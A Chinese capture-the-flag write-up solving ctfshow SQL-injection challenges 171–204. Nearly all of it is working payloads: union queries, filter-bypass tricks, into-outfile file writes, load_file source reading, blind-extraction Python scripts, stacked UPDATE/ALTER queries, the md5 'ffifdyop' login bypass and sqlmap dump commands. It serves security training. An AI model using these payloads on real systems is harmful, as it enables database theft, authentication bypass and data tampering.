CTFSHOW—sql注入

171
先用 order by 判断列数
再用 union select 联合查询,依次查出数据库、表、列、字段
flag 在 password 字段里

-1' union select 1,2,password from ctfshow_user --+

172
与171一样,多加了个表少了个列而已

-1' union select username,password from ctfshow_user2 --+

173
同上

1' union select id,username,password from ctfshow_user3--+
1' union select id,hex(username),hex(password,40) from ctfshow_user3 -- -
1' union select id,hex(username),right(password,40) from ctfshow_user3 -- -

感觉这两道题出题人屏蔽了回显中的 flag 字样,本意是要对回显编码一下,可是回显出来的 flag 值里并不包含 flag 这几个字符,所以编码不编码都可以。要是需要编码,可以用 hex() 转成 16 进制,或者 to_base64() 等等。
174
可以用replace函数将禁止输出的转换为别的字符,输出后再转回去

0' union select REPLACE(username,'g','j'),REPLACE(REPLACE(REPLACE(REPLACE(REPLACE(REPLACE(REPLACE(REPLACE(REPLACE(REPLACE(REPLACE(password,'g','9'),'0','h'),'1','i'),'2','j'),'3','k'),'4','l'),'5','m'),'6','n'),'7','o'),'8','p'),'9','q') from ctfshow_user4 where username='flag' %23

175
如果返回结果中没有 ASCII 码在 0x00-0x7f 范围内的字符,查询才会成功。
这几乎屏蔽了所有可打印字符,所以只能走不回显的路子:如果数据库账号有 FILE 权限(并且 secure_file_priv 没有限制导出目录、web 目录对 mysql 可写),可以用 into outfile 把查询结果写到 web 目录下的文件里,再直接访问这个文件。

0' union select 1,password from ctfshow_user5 into outfile '/var/www/html/1.txt' --+

176
过滤了小写的 select;MySQL 关键字不区分大小写,用大小写混写(sElect)绕过

-1' union sElect id,username,password from ctfshow_user where username='flag'--+

177

1'and'1'='1

用这个payload,可以检测出过滤了空格
通过注释绕过空格
通过括号绕过空格
反引号可以直接紧贴表名、列名写,省掉它们前后的空格
Tab键%09
两个空格代替一个空格,用Tab代替空格,%a0=空格:
%20 %09 %0a %0b %0c %0d %a0 %00 /**/ /*!*/

-1'/**/union/**/select/**/id,username,`password`from`ctfshow_user`where`username`='flag'%23
-1'%0bunion%0aselect%09id,username,`password`from`ctfshow_user`where`username`='flag'%23

178
/**/被过滤

-1'%09union%09select%09id,username,password%09from%09ctfshow_user%23

179

-1'%0cunion%0cselect%0cid,username,password%0cfrom%0cctfshow_user%23

180
burp跑id跑出来的

1111111'or(id=26)and'b'='b

1111111' 是为了闭合 != 'flag' 那个条件里的引号,让后面的 or(id=26) 生效;要是没有这个条件,直接输入 26 就好
181

1111'or(id=26)and'a'='a

182

1111'or(id=26)and'a'='a

183

mysql> select 'xxxyyy' regexp '^xx';
 
+-----------------------+
| 'xxxyyy' regexp '^xx' |
+-----------------------+
|           1 |
+-----------------------+
1 row in set (0.00 sec)
查询xxxyyy字符串中是否以xx开头,结果值为1,表示值为true,满足条件。


#-*- coding:utf-8 -*-
import string #导入string这个模块
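# Python 3 version of the string-constant cheat sheet: the original used
# Python 2 print statements and string.letters / string.lowercase /
# string.uppercase, none of which exist in Python 3.
print(string.digits)           # '0123456789'
print(string.ascii_letters)    # all ASCII letters, lowercase followed by uppercase
print(string.ascii_lowercase)  # 'abcdefghijklmnopqrstuvwxyz'
print(string.ascii_uppercase)  # 'ABCDEFGHIJKLMNOPQRSTUVWXYZ'
print(string.punctuation)      # every ASCII punctuation character
print(string.ascii_letters)    # replacement for the removed string.letters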
顺便记下吧,要不总忘

like 做的是 % 和 _ 通配符匹配,不是正则;regexp 才支持正则表达式。把猜测的字符拼进 like/regexp 模式时要注意,这些元字符(% _ . ^ $ 等)会造成误报。
count()是统计,这个sql语句是对table_name表中的所有行记录做个统计,就是查出表中有多少行数据。
脚本用的是 right,也可以用 substr。注意 like 在默认的 *_ci 排序规则下不区分大小写,所以这样爆出来的字母大小写有点不太准确。

import requests
import string
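# Candidate characters for each position. The guess ends up inside a LIKE
# pattern within a single-quoted literal, so:
#  - '%' and '_' are LIKE wildcards; they are escaped below so they match
#    literally instead of matching any row (a false positive);
#  - a quote or backslash would break the injected query and is left out.
str1 = "".join(
    c for c in string.digits + string.ascii_letters + string.punctuation
    if c not in "'\\"
)
url = "http://151bb639-2c31-4b57-9012-5efa4339852f.chall.ctf.show:8080/select-waf.php"
# The password is rebuilt from its right end: '}' is assumed to be the last
# character and every round prepends one more.
flag = "}"
session = requests.Session()
for k in range(2, 100):
    for i in str1:
        guess = i + flag
        # MySQL keeps the backslash of '\%' and '\_' inside a quoted literal,
        # so they reach LIKE as escape sequences and match the literal char.
        like_pattern = guess.replace("%", "\\%").replace("_", "\\_")
        # tableName is spliced into a row-count query; a single matching row
        # (presumably the flag user's) comes back as "$user_count = 1;".
        payload = "`ctfshow_user`where(right(pass,%d))like'%s'" % (k, like_pattern)
        data = {
            'tableName': payload
        }
        talk = session.post(url=url, data=data, timeout=10)
        if "$user_count = 1;" in talk.text:
            flag = guess
            print(flag)
            break
    else:
        # Nothing matched at this length: the password is complete, or it
        # contains a character outside str1.
        break
# NOTE: LIKE is case-insensitive under MySQL's default *_ci collations, so
# letters recovered here may differ in case from the stored value.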

184
where被过滤掉了找个可以替代的,并且这个没过滤空格.
用join进行联合查询,即可注入。详细了解join语法可看这篇文章:
https://www.cnblogs.com/reaptomorrow-flydream/p/8145610.html
这题过滤了单双引号,一开始没看见,脚本改了一下午(写完还忘了保存)。
直接搬了两位师傅的,第一个应该是群主师傅的改良版

import requests
#str1="flag{b7c4de-2hi1jk0mn5o3p6q8rstuvw9xyz}"
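url = "http://f15ac2ca-94b7-4257-a52a-00e52ecee805.chall.ctf.show/select-waf.php"

# Quotes are filtered in this challenge, so every character is spelled as
# char(n). A regex metacharacter used on its own as the whole pattern is
# harmful: '.' matches any character and '^', '$' or '|' match the empty
# string (all false positives), while '*', '+', '(' ... are invalid alone.
# Those are backslash-escaped (92 == ord('\\')) so they match only themselves.
regex_meta = set(r"\.^$|?*+()[]{}")
session = requests.Session()
flag = 'flag{'
done = False
# Positions 1-5 are the known 'flag{' prefix; guessing starts at 6.
for i in range(6, 45):
    if done:
        break
    for j in range(32, 127):  # printable ASCII only
        pattern = f"char(92,{j})" if chr(j) in regex_meta else f"char({j})"
        data = {
            "tableName": f"ctfshow_user as a right join ctfshow_user as b on (substr(b.pass,{i},1)regexp({pattern}))"
        }
        r = session.post(url, data=data, timeout=10)
        # The page echoes a row count; "$user_count = 43;" is the value the
        # original script treats as "ON condition true". The old
        # find(...) > 0 test would have missed a marker at offset 0.
        if "$user_count = 43;" in r.text:
            flag += chr(j)
            # REGEXP is case-insensitive on the default *_ci collations and
            # the uppercase range is tried first, so report in lowercase.
            print(flag.lower())
            done = chr(j) == "}"
            break
    else:
        # No printable character matched: end of the password, or a
        # character outside 32..126.
        break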


import requests

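url = '''http://e5e91710-3aa2-4752-a2a0-68a6c18fee26.chall.ctf.show/select-waf.php'''
data = {"tableName": ""}
flag = 'flag{'
# Alphabet ordered by expected frequency (the "群主亲传" dictionary). None of
# these characters is a LIKE wildcard, so the prefix compares literally.
alphabet = r'abcdefghijklmnopqrstuvwxyz0123456789{-}'
# Row count the page reports when the ON condition is false.
marker = '$user_count = 22;'
session = requests.Session()

for x in range(6, 50):  # positions 1-5 are the known 'flag{' prefix
    for y in alphabet:
        # Quotes are filtered, so the guessed prefix goes in as a hex literal
        # (0x...). The original used Python 2's str.encode('hex').
        temp = "0x" + (flag + y).encode().hex()
        data["tableName"] = 'ctfshow_user x right join ctfshow_user y on left(y.pass,%d) like %s' % (x, temp)
        s = session.post(url, data=data, timeout=10)
        # Any count other than the marker means the prefix matched. Only a
        # 200 reply is trusted: an error page would also lack the marker and
        # read as a false hit.
        if s.status_code == 200 and marker not in s.text:
            flag = flag + y
            print(flag)
            break
    else:
        # Nothing matched: the value is complete, or it contains a character
        # outside the alphabet.
        break
    if flag.endswith('}'):
        break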

185
过滤了数字,用 true 相加来拼数字(true 在 MySQL 里等于 1,true+true 就是 2)

import requests
# Instance-specific endpoint of challenge 185.
url = "http://79ef2075-ac91-4c03-adb9-c2319bc040ed.chall.ctf.show:8080/select-waf.php"
# Characters of the password recovered so far, one appended per position.
flag = str()
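def createNum(n):
    """Spell the integer *n* as a digit-free MySQL expression.

    Digits are filtered by the challenge, so a number is written as a sum of
    ``true`` literals (``true`` evaluates to 1): ``createNum(3)`` returns
    ``'true+true+true'``.

    Args:
        n: the integer to encode.

    Returns:
        A string expression that evaluates to *n* in MySQL. For ``n <= 0``
        the original code silently returned ``'true'`` (i.e. 1), which made
        position 0 indistinguishable from position 1; this version returns
        ``'false'`` (0) instead.
    """
    if n <= 0:
        return 'false'
    return '+'.join(['true'] * n)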
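# A regex metacharacter used alone as the pattern either matches anything
# ('.'), matches the empty string ('^', '$', '|') or is invalid on its own;
# backslash-escape them (92 == ord('\\')) so they match only themselves.
regex_meta = set(r"\.^$|?*+()[]{}")
session = requests.Session()
done = False
# substr() positions are 1-based; the original started at 0, and since
# createNum(0) spelled 1, the first character was recovered twice.
for i in range(1, 50):
    if done:
        break
    for j in range(32, 127):  # printable ASCII only
        if chr(j) in regex_meta:
            pattern = "char({0},{1})".format(createNum(92), createNum(j))
        else:
            pattern = "char({0})".format(createNum(j))
        data = {
            "tableName": "ctfshow_user as a right join ctfshow_user as b on (substr(b.pass,{0},{1})regexp({2}))".format(createNum(i), createNum(1), pattern)
        }
        r = session.post(url, data=data, timeout=10)
        # "$user_count = 43;" is the row count the original script treats as
        # "ON condition true". REGEXP is case-insensitive on the default
        # *_ci collations and uppercase is tried first, so the result may
        # need .lower().
        if "$user_count = 43;" in r.text:
            flag += chr(j)
            print(flag)
            done = chr(j) == "}"
            break
    else:
        # No printable character matched: end of value or a char outside 32..126.
        break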


# flag="W{C71C97F9-5610-45B1-9E29-F3FF73ADD0F6}"
# print(flag.lower())

186

import requests
# Instance-specific endpoint of challenge 186.
url = "http://3a7abf5d-8f36-4cab-8058-02c972aa00a0.chall.ctf.show:8080/select-waf.php"
# Characters of the password recovered so far, one appended per position.
flag = str()
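def createNum(n):
    """Spell the integer *n* as a digit-free MySQL expression.

    Digits are filtered by the challenge, so a number is written as a sum of
    ``true`` literals (``true`` evaluates to 1): ``createNum(3)`` returns
    ``'true+true+true'``.

    Args:
        n: the integer to encode.

    Returns:
        A string expression that evaluates to *n* in MySQL. For ``n <= 0``
        the original code silently returned ``'true'`` (i.e. 1), which made
        position 0 indistinguishable from position 1; this version returns
        ``'false'`` (0) instead.
    """
    if n <= 0:
        return 'false'
    return '+'.join(['true'] * n)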
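# A regex metacharacter used alone as the pattern either matches anything
# ('.'), matches the empty string ('^', '$', '|') or is invalid on its own;
# backslash-escape them (92 == ord('\\')) so they match only themselves.
regex_meta = set(r"\.^$|?*+()[]{}")
session = requests.Session()
done = False
# substr() positions are 1-based; the original started at 0, and since
# createNum(0) spelled 1, the first character was recovered twice.
for i in range(1, 50):
    if done:
        break
    for j in range(32, 127):  # printable ASCII only
        if chr(j) in regex_meta:
            pattern = "char({0},{1})".format(createNum(92), createNum(j))
        else:
            pattern = "char({0})".format(createNum(j))
        data = {
            "tableName": "ctfshow_user as a right join ctfshow_user as b on (substr(b.pass,{0},{1})regexp({2}))".format(createNum(i), createNum(1), pattern)
        }
        r = session.post(url, data=data, timeout=10)
        # "$user_count = 43;" is the row count the original script treats as
        # "ON condition true". REGEXP is case-insensitive on the default
        # *_ci collations and uppercase is tried first, so the result may
        # need .lower().
        if "$user_count = 43;" in r.text:
            flag += chr(j)
            print(flag)
            done = chr(j) == "}"
            break
    else:
        # No printable character matched: end of value or a char outside 32..126.
        break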


# flag="1111IHW{D72377E0-FF80-44C2-9D32-F172DC25E04F}"
# print(flag.lower())

187
md5(string,true)函数在指定了true的时候,返回的是原始 16 字节的二进制格式,也就是说会返回这样子的字符串:'or'6\xc9]\x99\xe9!r,\xf9\xedb\x1c。拼进 where password='...' 这类语句后,开头的 'or'6 会把条件变成 password='' or '6...',而 '6...' 在数值上下文里会转成 6,为真,于是整个条件恒真。

提供两个字符串: ffifdyop、129581926211651571912466741651878684928

content: ffifdyop
hex: 276f722736c95d99e921722cf9ed621c
raw: 'or'6\xc9]\x99\xe9!r,\xf9\xedb\x1c
string: 'or'6]!r,b

188
SELECT * FROM TEST WHERE username = 0
查到全部结果:

USER_IDUSERNAME
1Jason
2OOO
3Stack
4Overflow
username=0

pass 为 0 是因为密码比较是弱类型比较:非数字开头的字符串和整数 0 比较时会被转换成 0,所以 pass=0 对所有行都成立

username:0||1
password:0

189

import requests
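url = "http://9d4a4fc2-c2f3-4f35-8775-3e6d594cac14.chall.ctf.show:8080/api/index.php"
# The injected username reads the application source with load_file() and
# leaks it one byte at a time through the truth value of if().
flag = ""
session = requests.Session()
for i in range(1, 10000):
    # Binary search over the full byte range: load_file() returns raw bytes,
    # and PHP source contains newlines/tabs (< 32) that the old 32..127
    # search could only ever report as a space. ascii('') is 0 past the end
    # of the file, which ends the loop.
    head = 0
    tail = 255
    while head < tail:
        mid = (head + tail) >> 1
        payload = "if(ascii(substr(load_file('/var/www/html/api/index.php'),{0},1))>{1},1,0)".format(i, mid)
        data = {
            'username': payload,
            'password': '1'
        }
        talk = session.post(url=url, data=data, timeout=10)
        # The script treats "查询失败" (query failed) as the true branch:
        # username became 1 and matched no row, so the byte is > mid. When
        # false, username is 0, which (as in challenge 188) compares equal
        # to every string username.
        if "查询失败" in talk.json()['msg']:
            head = mid + 1
        else:
            tail = mid
    if head == 0:
        break  # end of file
    # Bytes >= 128 come out as Latin-1 code points; the file is assumed ASCII.
    flag += chr(head)
    print(flag)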

190

import requests
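url = "http://76887eea-2b05-4568-8286-11e205eae400.chall.ctf.show:8080//api/"
flag = ""
# Enumeration stages: the first two were run earlier to find the table and
# column names; only the last one is used now. Hoisted out of the loop so
# they are not rebuilt on every request.
payload1 = "select group_concat(table_name) from information_schema.tables where table_schema=database()"
payload2 = "select group_concat(column_name) from information_schema.columns where table_name='ctfshow_fl0g'"
payload3 = "select`f1ag`from(ctfshow_fl0g)"
query = payload3
session = requests.Session()
for i in range(1, 1000):
    # Binary search on the byte at position i. Start at 0 so that ascii('')
    # (past the end of the value) resolves to 0 and ends the loop instead
    # of being reported as a space forever.
    head = 0
    tail = 127
    while head < tail:
        mid = (head + tail) >> 1
        payload = "admin' and if(ascii(substr(({0}),{1},1))>{2},1,0) -- ".format(query, i, mid)
        data = {
            'username': payload,
            'password': '1'
        }
        talk = session.post(url=url, data=data, timeout=10)
        # "密码错误" (wrong password) means the admin row was selected, i.e.
        # the if() was true and the byte is greater than mid.
        if "密码错误" == talk.json()['msg']:
            head = mid + 1
        else:
            tail = mid
    if head == 0:
        break  # end of value
    flag += chr(head)
    print(flag)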

191

import requests
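url = "http://d7d6dff2-db88-497e-ba34-62ef5cb2280c.chall.ctf.show:8080/api/"
flag = ""
# Enumeration stages; the first two were run earlier, only the last is used.
payload1 = "select group_concat(table_name) from information_schema.tables where table_schema=database()"
payload2 = "select group_concat(column_name) from information_schema.columns where table_name='ctfshow_fl0g'"
payload3 = "select`f1ag`from(ctfshow_fl0g)"
query = payload3
# Alphabet ordered by expected frequency so hits come early. Note that '='
# is case-insensitive under the default *_ci collations, so an uppercase
# character in the value is reported in lowercase.
alphabet = 'flag{b7c4de-2hi1jk0mn5o3p6q8rstuvw9xyz}'
session = requests.Session()
for i in range(1, 1000):
    for j in alphabet:
        # Ending with and '1'='1 keeps the original quote balanced instead of
        # commenting the tail of the query out.
        payload = "admin' and if(substr(({0}),{1},1)='{2}',1,0) and '1'='1".format(query, i, j)
        data = {
            'username': payload,
            'password': '1'
        }
        talk = session.post(url=url, data=data, timeout=10)
        # "密码错误" (wrong password): the admin row was selected, so the if()
        # was true and this character is correct.
        if "密码错误" == talk.json()['msg']:
            flag += j
            print(flag)
            break  # one hit per position; the old loop kept sending requests
    else:
        # No alphabet character matched: end of value, or a character outside
        # the alphabet.
        break
    if j == '}':
        break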
#还可以用ord函数

192
同191

import requests
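url = "http://f6db9285-fe7d-4699-87e3-c2c239528412.chall.ctf.show:8080/api/"
flag = ""
# Enumeration stages; the first two were run earlier, only the last is used.
payload1 = "select group_concat(table_name) from information_schema.tables where table_schema=database()"
payload2 = "select group_concat(column_name) from information_schema.columns where table_name='ctfshow_fl0g'"
payload3 = "select`f1ag`from(ctfshow_fl0g)"
query = payload3
# Alphabet ordered by expected frequency so hits come early. Note that '='
# is case-insensitive under the default *_ci collations, so an uppercase
# character in the value is reported in lowercase.
alphabet = 'flag{b7c4de-2hi1jk_0mn5o3p6q8rstuvw9xyz}'
session = requests.Session()
for i in range(1, 1000):
    for j in alphabet:
        payload = "admin' and if(substr(({0}),{1},1)='{2}',1,0) -- ".format(query, i, j)
        data = {
            'username': payload,
            'password': '1'
        }
        talk = session.post(url=url, data=data, timeout=10)
        # "密码错误" (wrong password): the admin row was selected, so the if()
        # was true and this character is correct.
        if "密码错误" in talk.json()['msg']:
            flag += j
            print(flag)
            break  # one hit per position; the old loop kept sending requests
    else:
        # No alphabet character matched: end of value, or a character outside
        # the alphabet.
        break
    if j == '}':
        break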

193

import requests
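url = "http://e2394be5-bf88-4b7c-b742-3fc88ff2a46b.chall.ctf.show:8080/api/"
flag = ""
# Enumeration stages; the first two were run earlier, only the last is used.
payload1 = "select group_concat(table_name) from information_schema.tables where table_schema=database()"
payload2 = "select group_concat(column_name) from information_schema.columns where table_name='ctfshow_flxg'"
payload3 = "select`f1ag`from(ctfshow_flxg)"
query = payload3
# Alphabet ordered by expected frequency so hits come early. Note that '='
# is case-insensitive under the default *_ci collations, so an uppercase
# character in the value is reported in lowercase.
alphabet = 'flag{b7c4de-2hi1jk_0mn5o3p6q8rstuvw9xyz}'
session = requests.Session()
for i in range(1, 1000):
    for j in alphabet:
        # mid() is used in place of substr() (left/right would also do).
        payload = "admin' and if(mid(({0}),{1},1)='{2}',1,0) -- ".format(query, i, j)
        data = {
            'username': payload,
            'password': '1'
        }
        talk = session.post(url=url, data=data, timeout=10)
        # "密码错误" (wrong password): the admin row was selected, so the if()
        # was true and this character is correct.
        if "密码错误" in talk.json()['msg']:
            flag += j
            print(flag)
            break  # one hit per position; the old loop kept sending requests
    else:
        # No alphabet character matched: end of value, or a character outside
        # the alphabet.
        break
    if j == '}':
        break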
#可以用mid,left,right

194

import requests
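url = "http://9f97023d-32c0-4761-8325-0fdb950b076e.chall.ctf.show:8080/api/"
flag = ""
# Enumeration stages; the first two were run earlier, only the last is used.
payload1 = "select group_concat(table_name) from information_schema.tables where table_schema=database()"
payload2 = "select group_concat(column_name) from information_schema.columns where table_name='ctfshow_flxg'"
payload3 = "select`f1ag`from(ctfshow_flxg)"
query = payload3
# Alphabet ordered by expected frequency so hits come early. Note that '='
# is case-insensitive under the default *_ci collations, so an uppercase
# character in the value is reported in lowercase.
alphabet = 'flag{b7c4de-2hi1jk_0mn5o3p6q8rstuvw9xyz}'
session = requests.Session()
for i in range(1, 1000):
    for j in alphabet:
        payload = "admin' and if(mid(({0}),{1},1)='{2}',1,0) -- ".format(query, i, j)
        data = {
            'username': payload,
            'password': '1'
        }
        talk = session.post(url=url, data=data, timeout=10)
        # "密码错误" (wrong password): the admin row was selected, so the if()
        # was true and this character is correct.
        if "密码错误" in talk.json()['msg']:
            flag += j
            print(flag)
            break  # one hit per position; the old loop kept sending requests
    else:
        # No alphabet character matched: end of value, or a character outside
        # the alphabet.
        break
    if j == '}':
        break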

195

6;update(ctfshow_user)set`username`=6;
6;update(ctfshow_user)set`pass`=123;
username:6
password:123

196

username:6;select(6);
password:6

197-198

username:1;show tables;
password:ctfshow_user
或者用
0;alter table ctfshow_user change column `pass` `ppp`
varchar(255);
alter table ctfshow_user change column `id` `pass` varchar(255);
alter table ctfshow_user change column `ppp` `id` varchar(255);
这位师傅的方法是把 id 和 pass 两列的列名调换一下,这样回显出来的 id 其实就是密码;因为存在 admin 用户,再爆破一下 password 就好。admin 需要写成 16 进制,因为 username 外面没有单引号,直接写 admin 不会被当成字符串,会报错。

199-200

username:1;show tables;
password:ctfshow_user

201

py sqlmap.py -u http://ef10ecde-5d52-4969-8cce-f6667883b929.chall.ctf.show:8080/api/?id=1 --referer="ctf.show" -D "ctfshow_web" -T "ctfshow_user" -C "pass" --dump

202

py sqlmap.py http://58b01807-5ef0-4a36-8890-5248a7bd48a9.chall.ctf.show:8080/api/ --data="id=1" --referer="ctf.show" -D "ctfshow_web" -T "ctfshow_user" -C "pass" --dump

203

py sqlmap.py http://5ce3d12a-eac4-48ad-8dbe-587ebabe5de2.chall.ctf.show:8080/api/index.php --method=PUT --data="id=1" --headers="Content-Type: text/plain" --referer="ctf.show" -D "ctfshow_web" -T "ctfshow_user" -C "pass" --dump

204
